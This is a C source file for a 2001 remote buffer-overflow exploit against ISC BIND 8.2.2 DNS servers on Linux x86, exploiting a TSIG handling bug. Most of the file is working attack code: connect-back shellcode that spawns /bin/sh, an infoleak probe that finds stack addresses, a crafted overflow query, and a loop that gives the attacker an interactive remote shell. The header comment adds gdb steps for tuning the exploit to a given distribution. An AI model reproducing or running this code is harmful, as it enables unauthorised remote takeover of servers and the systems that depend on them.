/*
 * Tamandua Laboratories. - CONFIDENTIAL - *** PROOF OF CONCEPT ***
 * Copyright (C) 2001 Tamandua Laboratories.
 * Powered by Axur Communications Inc. - www.axur.org
 *
 * Author   : Gustavo Scotti   (scotti@axur.org)
 * Co-Author: Thiago Zaninotti 
 *
 *
 * ENGLISH EXPLANATION:
   --------------------
   
   HOW DOES THE TSIG's BUG WORK, AND HOW TO EXPLOIT IT?
   
   The NAI(1)'s discovered TSIG bug is serious, but not that much. To
   exploit it, you'll need lucky (or at least some well known host).

   Actually, you get the stack modified, and all you can overwrite is
   ebp, not the return address. This give us a longer way to get the 
   return address modified. I'll try to exemplify it on pure ASCII graphics:
   
                    | EBP  | RET ADDRESS | FUNCTION PARAMETERS
                    ^
                   ESP
                   
   The named server after finding the TSIG RR, and checking that the key is 
   not valid, by its rfc, it answers the question, but appends a truncated 
   TSIG RR. The vulnerability is: the named calculates the message lenght by
   the fully qualified TSIG record, not by checking the truncated one. 
   
   When named starts to re-construct the answer, it skips the question, and 
   then answers the truncted RR TSIG. The way we did it, we offer named a as 
   much longer as question can be, so when it answers the TSIG, boom, we got
   our ebp modified.
   
   
   EVERYTHING CAN'T BE SO TRIVIAL:
   
   You are right! When the function named as "datagram_read" exits, the ebp
   is then changed, affecting its parent function that calls "__evDrop". 
   evDrop needs a pointer to a structure, so it can process the event ok. 
   When ns_sign overrun the stack, it fills in with "0x0011" (error code to 
   badkey) and "0x0000" (other data len - only used when errorcode = badtime).
   In other words, you cannot fill in the LSB's ebp with arbitrary value. 
   After some while, we found out that:
   
       * To exploit it, you'll need the ebp lsb >= 0x54. That's because of
         ebp, and the internal evDrop local variables and the TSIG answer.
         A distribution should load as much environment variables as to make
         ebp least significant byte greater than 0x54. Slackware almost do 
         that, so it's not vulnerable by default. Redhat showed us that it is
         vulnerable. Other distros should be checked. We have made a probing
         method that would help you port it to your distribution.
         
         
       * Getting your signatures:
       
         1) boot your linux distro straight! - this is very important
         2) get the process PID and then run gdb
         3) type "attach <pid_number>"
         3) (gdb) continue
         4) run the probe mode.
         5) if you get a SIGABORT, then your distribution is not vulnerable.
         6) if you get a SEGV, you have great chances to exploit it :)
         7) issue a "i r ebp" on gdb
            take a look:
            ebp         0xbffff8dc
                                ^^-> this is the least significant byte,
                                     if you don't know him :)
            This value should be greater than 0x54. (in this case, it is
            vulnerable);
            
         8) pass it as a parameter to the exploit, and you'll get there :)
         
            
       * There are differences when the system runs "named" and when a user
         runs it. That's all because environment variables (when you log in, 
         you load up a lot more of it). So you can scan both modes.
         
       * PS: Now of Feb 4th, we have included the infoleak bug to probe for
         ebp values. - no more debug nor operating system probes. 
         
 
 (1) NAI is a registered trademark of Network Associates Inc. and it is copyrighted.


*/

#include <../src/raccess.h>
#include <stdlib.h>
#include <stdio.h>
#include <netdb.h>
#include <netinet/in.h>
#include <sys/time.h>
#include <unistd.h>

typedef	unsigned char        u8;
typedef unsigned short       u16;
typedef unsigned long        u32;

/* SHELLCODE - this is a connect back shellcode */

u8 shellcode[]=
"\x3c\x90\x89\xe6\x83\xc6\x40\xc7\x06\x02\x00\x0b\xac\xc7\x46"
"\x04\x7f\x00\x00\x01\x31\xc0\x89\x46\x08\x89\x46\x0c\x31\xc0\x89"
"\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43"
"\x31\xc0\x83\xc0\x66\x51\x53\x50\xcd\x80\x89\x46\x20\x90\x3c\x90"
"\x8d\x06\x89\x46\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x58\x5b\x59"
"\x43\x43\xff\x76\x20\xcd\x80\x5b\x4f\x74\x32\x8b\x04\x24\x89\x46"
"\x08\x90\xbd\x7f\x00\x00\x01\x89\x6e\x04\xc7\x06\x03\x80\x35\x86"
"\xb8\x04\x00\x00\x00\x8d\x0e\x31\xd2\x83\xc2\x0c\xcd\x80\xc7\x06"
"\x02\x00\x0b\xab\x89\x6e\x04\x90\x31\xff\x47\xeb\x88\x90\x31\xc0"
"\x83\xc0\x3f\x31\xc9\x50\xcd\x80\x58\x41\xcd\x80\xc7\x06\x2f\x62"
"\x69\x6e\xc7\x46\x04\x2f\x73\x68\x00\x89\xf0\x83\xc0\x08\x89\x46"
"\x08\x31\xc0\x89\x46\x0c\xb0\x0b\x8d\x56\x0c\x8d\x4e\x08\x89\xf3"
"\xcd\x80\x31\xc0\x40\xcd\x80";
/* DIVERSE OPERATING SYSTEMS NUMBERS */
struct t_os
   {
   u8	*name;
   u32  ebp;
   u32  desloc;
   };
   
struct t_os OS[]={
   { "Linux Slackware TMDLabs tests - Gustavo", 0xbffff8cc, 2 }
 , { "Linux Redhat 6.1 8.2.2-P5 - Gustavo", 0xbffffc5c, 2 }
 , { NULL, 0 }
};

int verbose=0;

/* DNS STRUCTURE */
struct t_query
{
   u16 		id;
   u8		rd:1,		/* recursion desired */
      		tc:1,		/* truncated message */
                aa:1,		/* authoritative answer */
                opcode:4,	/* message opcode */
                qr:1;		/* response flag */
   u8	        rcode:4,	/* response code */
      		unused:2,
                pr:1,		/* primary server required */
                ra:1;		/* recursion available */
   u16	        qdcount,	/* no of question entries */
      		ancount,	/* no of answers entries */
                nscount,	/* no of authority entries */
                arcount;	/* no of resource entries */
};


/* NETWORKING FUNCTIONS */
u32 
dns2ip( host)
u8 *host;
{
        struct hostent *dns;
        u32	saddr;
        dns = gethostbyname( host);
        if (!dns)
           return 0xffffffff;
        bcopy( (char *)dns->h_addr, (char *)&saddr, dns->h_length);
        return ntohl(saddr);
}

int
udp_connect(u32 addr, u16 port)
{
	struct sockaddr_in client;
        int new_fd;

        new_fd = socket( AF_INET, SOCK_DGRAM, 0);
        if (new_fd<0)
           return -1;
        
   	bzero( (char *) &client, sizeof( client));
        client.sin_family = AF_INET;
        client.sin_addr.s_addr = htonl( addr); 
	client.sin_port = htons( port);
        if (connect( new_fd, (struct sockaddr *) &client, sizeof(client))<0)
           return -2; /* cant bind local address */

        return new_fd;
}

u32 retrieve_local_info(int sock)
{
   struct sockaddr_in server;
   int    soclen;
   soclen = sizeof(server);
   if (getsockname(sock, (struct sockaddr *)&server, &soclen)<0)
       {
       printf("*  error in getsockname\n");
       exit(0);
       }
   return htonl(server.sin_addr.s_addr);
}

int 
bind_tcp( u16 *port)
{
   struct sockaddr_in mask_addr;
   int sock, portno=25000; /* base_port */

   sock = socket( AF_INET, SOCK_STREAM, 0);
   if (sock<0)
      return sock;

redo:
   mask_addr.sin_family = AF_INET;
   mask_addr.sin_port = htons( portno);
   mask_addr.sin_addr.s_addr = 0;

   if (bind(sock, (struct sockaddr *)&mask_addr, sizeof(mask_addr))<0)
      {
error:
      portno++;
      if (portno>26000)
         {
         printf("*  no TCP port to bind in.\n");
         exit(0);
         }
      goto redo;
      }
   if (listen( sock, 0)<0)
      goto error;

   printf(".  TCP listen port number %d\n", portno);
   if (port)
      *port = portno;
   return sock;
}


/* DNS functions */

u8 
*encode_name( u8 *data, int *out_size)
{
   int i,n;
   static u8 out[1024];
   u8  *head;
   
   head = out;
   snprintf(out, sizeof(out), "1%s", data);
   *out_size = strlen(out);
   for (n=0,i=1;i<*out_size;i++)
       {
       if (out[i]=='.') 
          {
          *head = n;
          head = &out[i];
          n=0;
          }
       else n++;
       }
   *head=n;
   return out;
}

void fill_domainname(u8 *fill, int size)
{
   u8 c='A';
   while (size)
      {
      int n,i;

      if (size>63) n=62;
         else n=size-1;
         
      *fill++=n; 
      if (c!=0x44)
         memset(fill, c, n);
      else
        for (i=0;i<n;i++) fill[i]=i;
      c++;
      fill+=n;
      size-=(n+1);
      }
}

/* SHELL CODE ASSEMBLY */
u8 *assembly_shellcode( u32 ebp)
{
   static u8 	buff[512];
   u8		*shell;
   u32 		ret_addr, addr, offset, pad_offset;

   addr   = ebp & ~(0xff);
   offset = ebp & 0xff;

   if (offset < 0x54)
      {
      printf("*  this ebp is not vulnerable. sorry!\n");
      exit(0);
      }
   
   
   
   offset = 0x22b - offset;
   
   shell = buff;
   pad_offset = sizeof(shellcode)-1;

   ret_addr = addr - offset - 1;	/* perfect align :) */
   
   memcpy(shell, shellcode, sizeof(shellcode));
   fill_domainname( &buff[pad_offset], (offset-pad_offset));
   /* fill ebp data */
   shell = &buff[offset];
   *shell=16;			shell++;
   *(u32 *)shell = 6; 		shell+=4;	/* evDrop event */ 
   *(u32 *)shell = ret_addr;	shell+=4;	/* return address */
   *(u32 *)shell = ebp; 	shell+=4;	/* ebp info */ 
   *(u32 *)shell = addr;			/* evDrop event pointer */
   offset+=17;
   fill_domainname( &buff[offset], 488-offset);
      
   buff[488]=0;
   return buff;
}



int
assembly_dns_query( u8 *packet, u32 ebp)
{
   struct t_query	*hdr;
   u8			*data, *encoded_shell;
   int 			size;
   
   bzero(packet, sizeof(struct t_query));
   hdr = (struct t_query *)packet;

   hdr->id = getpid();
   hdr->qdcount = 1;
   hdr->opcode  = 0; /* QUERY */
   hdr->arcount = 1; /* yes, we have the TSIG here */

   data = (u8 *)(hdr + 1);
   
   encoded_shell = assembly_shellcode( ebp);
   memcpy(data, encoded_shell, 489);
   data += 489;
   *(u16 *)data = htons(1); 	/* QUERY type */
   data += sizeof(u16);
   *(u16 *)data = htons(1); 	/* QUERY class */
   data += sizeof(u16);
   *data++ = 0; 		/* RR DOMAIN NAME (none) */
   *(u16 *)data = htons(250); 	/* TSIG RR type */
   data += sizeof(u16);
   *(u16 *)data = htons(255); 	/* TSIG RR class = ANY */
   data += sizeof(u16);

   /* switch host to network byte ordering (HEADER ONLY!) */
   hdr->id = htons( hdr->id);
   hdr->qdcount = htons( hdr->qdcount);
   hdr->ancount = htons( hdr->ancount);
   hdr->nscount = htons( hdr->nscount);
   hdr->arcount = htons( hdr->arcount);
   
   return (data - packet);
}

int
assembly_dns_infoleak_query( u8 *packet)
{
   struct t_query	*hdr;
   u8			*data, *encoded_zone;
   int 			size;
   
   bzero(packet, sizeof(struct t_query));
   hdr = (struct t_query *)packet;

   hdr->id = getpid();
   hdr->opcode  = 1; 			/* IQUERY */
   hdr->rd = 1; hdr->ra = 1;
   hdr->ancount = 1;

   data = (u8 *)(hdr + 1);
   fill_domainname( data, 440);
   data[440]=0;
   data+=441;
   
   *(u16 *)data = htons(1); 		/* A type */
   data += sizeof(u16);
   *(u16 *)data = htons(1);		/* CHAOS class */
   data += sizeof(u16);
   *(u32 *)data = htonl(1);		/* TTL */
   data += sizeof(u32);
   *(u16 *)data = htons(255);		/* EVIL SIZE */
   data += sizeof(u32);
   /* switch host to network byte ordering (HEADER ONLY!) */
   hdr->id = htons( hdr->id);
   hdr->qdcount = htons( hdr->qdcount);
   hdr->ancount = htons( hdr->ancount);
   hdr->nscount = htons( hdr->nscount);
   hdr->arcount = htons( hdr->arcount);
   
   return (data - packet);
}

int
assembly_dns_chaos_query( u8 *packet)
{
   struct t_query	*hdr;
   u8			*data, *encoded_zone;
   int 			size;
   
   bzero(packet, sizeof(struct t_query));
   hdr = (struct t_query *)packet;

   hdr->id = getpid();
   hdr->qdcount = 1;
   hdr->opcode  = 0; 			/* QUERY */

   data = (u8 *)(hdr + 1);
   
   encoded_zone = encode_name( "version.bind", &size);
   encoded_zone[size++]=0;
   memcpy(data, encoded_zone, size);
   data += size;
   *(u16 *)data = htons(16); 		/* TXT type */
   data += sizeof(u16);
   *(u16 *)data = htons(3);		/* CHAOS class */
   data += sizeof(u16);

   /* switch host to network byte ordering (HEADER ONLY!) */
   hdr->id = htons( hdr->id);
   hdr->qdcount = htons( hdr->qdcount);
   hdr->ancount = htons( hdr->ancount);
   hdr->nscount = htons( hdr->nscount);
   hdr->arcount = htons( hdr->arcount);
   
   return (data - packet);
}




void
check_data(int fd, u16 local_port, int probe)
{
  u8 		pkt[1024]; 
     		/* no packet can have more than this... */
  
  u32	        ebp;
  u32	        r_addr;
  u16		r_port;
  int		n,i;
  
/*  n = udp_read(fd, &r_addr, &r_port, pkt, sizeof(pkt));   */
  n = read(fd, pkt, sizeof(pkt));  

  if (n<sizeof(struct t_query))
     return;
  else
     {
     struct t_query 	*query;
     u8			*data;
     
     query = (struct t_query *)pkt;
     data  = (u8 *)(query+1);
     if (verbose)
        {
        printf("recebi query de resposta: %d bytes\n", n);

        printf("packet id=%x\n", query->id);
        printf("rd %d, tc %d, aa %d, opcode %d, qr %d\n",
           query->rd, query->tc, query->aa, query->opcode, query->qr);
        printf("rcode %d, pr %d, ra %d\n", 
           query->rcode, query->pr, query->ra);
        printf("counts: qd %d, an %d, ns %d, ar %d\n",
           htons(query->qdcount), htons(query->ancount), htons(query->nscount), 
           htons(query->arcount));
        
        printf("\n**** RECV PACKET DUMP ****\n");
        for (i=0;i<n;i++)
           {
           if (!(i % 16)) printf("\n%04x  ", i);
              printf("%02x ", pkt[i]);
           }
                 
        printf("\n");
        }
     
     if (query->rcode==1 && query->opcode==1 && query->rd && query->qr)
        /* infoleak answer */
        {
        u32  local_addr;
        
        ebp = *(u32 *)&pkt[0x214];
        ebp -= 0x20;
        printf("\bebp is %08x\n", ebp);
        if (probe)
           {
           exit(0);
           }
        printf(".  waiting for connect_back shellcode response...  ");
        local_addr = retrieve_local_info(fd);
        
        *(u32 *)&shellcode[0x62] = htonl(local_addr);
        *(u16 *)&shellcode[0x81] = htons(local_port);
        /* start to dump da packet away */
        n = assembly_dns_query( pkt, ebp);
        write( fd, pkt, n);
        }
        

     if (query->rcode)
        {
        printf("\n*  error on binding receiving the message\n");
        exit(0);
        }

     if (query->ancount) /* we have answer */
        {
        u16  type, class;

        /* skip domainname */
        while (*data)
           data += (1+*data);
        data++;
        type  = ntohs(*(u16 *)data); data += sizeof(u16);
        class = ntohs(*(u16 *)data); data += sizeof(u16);
        if (type==16 && class==3) /* the answer for our bind baby */
        /* skip domainname */
        while (*data)
           data += (1+*data);
        data+=11;
        data[*data+1]=0; data++;
        printf("\b%s\n", data);
        printf(".  probing ebp...  ");
        n = assembly_dns_infoleak_query( pkt);
        write( fd, pkt, n);
        
        }
     }  
}


proxy_loop(int sock)
{
   fd_set fds;
   u8     tmp[256];
   int    tcp, addr_len;
   struct sockaddr_in server;

   addr_len = sizeof(server);
   tcp = accept( sock, (struct sockaddr *)&server, &addr_len);
   printf("\bconnected\n.       ^---> from %s:%d\n", inet_ntoa(server.sin_addr), ntohs(server.sin_port));
   close(sock); /* closing incoming socket */
   printf(".  congratulations. you have owned this one.\n");
    
    sprintf(tmp,"uname -a; id\n");
    send(tcp, tmp, strlen(tmp), 0);
    /* basic async mode */
    while (1)
        {
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(tcp, &fds);
       
        if (select(tcp+1, &fds, NULL, NULL, NULL)>0)
           {
           if (FD_ISSET(0, &fds))
              {
              int n;
              n = read(0, tmp, 256);
              if (n<0)
                 goto end_conn;
              if (write(tcp, tmp, n)!=n) goto end_conn;
              }
           if (FD_ISSET(tcp, &fds))
              {
              int n;
              n = read(tcp, tmp, 256);
              if (n<0)
                 goto end_conn;

              if (write(0, tmp, n)!=n) goto end_conn;
              }
	   }
	}
end_conn:
    close(tcp);
    printf(".  bye-bye. Stay tuned for more Tamandua Labs codes.\n");  
    exit(0);
}





/* INFO ON MAIN:
   -------------
   
   This exploit will probe for bind's version, and then will try to exploit
   it. Thus, it gets the local address information, to connect back.
   
*/


int main(int argc, char **argv)
{
   u32 			addr;
   int 			dns_fd, local_fd;
   u8			data[1024];
   u16			local_port;

   int			probe=0;

   fd_set           	fd_r;
   struct timeval   	tv;
   char             	try_ch[4]="/-\\|";

   int 			i, n, max_fd;

   printf(".  ISC bind 8.2.2-x remote buffer-overflow for linux x86\n");
   printf(".  (c)2001 Tamandua Laboratories - www.axur.com.br\n");
   printf(".  (c)2001 Gustavo Scotti <scotti@axur.org>\n\n");

   for (;;)
      {
      int	c;
      int	option_index = 0;

      c = getopt (
		argc, argv,
		"hvp");
      if (c == EOF)
         break;
   
      switch (c)
	        {
		case 'h': /* help */
			printf
			(
"   usage: %s [-phv] target\n"
"\n"
"   -h, --help               this message\n"
"   -v, --verbose            verbose\n"
"   -p, --probe              probe only!\n"
"\n", argv[0]
			);
			return 0;
                        break;
                case 'p': probe=1;
                   	  break;
                case 'v': /* verbose */
                        verbose=1;
                        break;
                }
      }
      
   if (optind >= argc)
      {
      printf( "*  no target especified\n");
      return 1;
      }
   
   addr = dns2ip(argv[optind]);
   if (addr==0xffffffff)
      {
      printf("*  could not resolve '%s'\n", argv[optind]);
      exit(0);
      }
   
   local_fd = bind_tcp(&local_port);
   dns_fd = udp_connect( addr, 53); 
   n = assembly_dns_chaos_query( data);
   write( dns_fd, data, n);
   max_fd = 1+(local_fd > dns_fd ? local_fd : dns_fd);
   printf(".  waiting for server response...  ");

   while (1)
      for (n=0;n<20;)
      {
      int i;

      printf("\b%c", try_ch[(n%4)]);
      fflush(stdout);

      FD_ZERO( &fd_r);
      FD_SET( dns_fd, &fd_r);
      FD_SET( local_fd, &fd_r);

      tv.tv_sec  = 0;
      tv.tv_usec = 50000;

      i =select( max_fd, &fd_r, NULL, NULL, &tv);
      if (!i) { n++; continue; }
      if (i>0)
         if (FD_ISSET(dns_fd, &fd_r)) check_data(dns_fd, local_port, probe);
      else
         if (FD_ISSET(local_fd, &fd_r)) proxy_loop(local_fd);
      }
}



/*

----- tmd info tag -----
#  tmdl-003
v  ISC Bind Server 		(8.2.2.x)
w  february, 2nd 2001
a  Gustavo Scotti   		(scotti@axur.org)
i  do not run this behind a masquerade server. the shellcode is a connect 
i  back and it does probe for local address.
*/
/*                   www.hack.co.za  [1 March 2001]*/ 
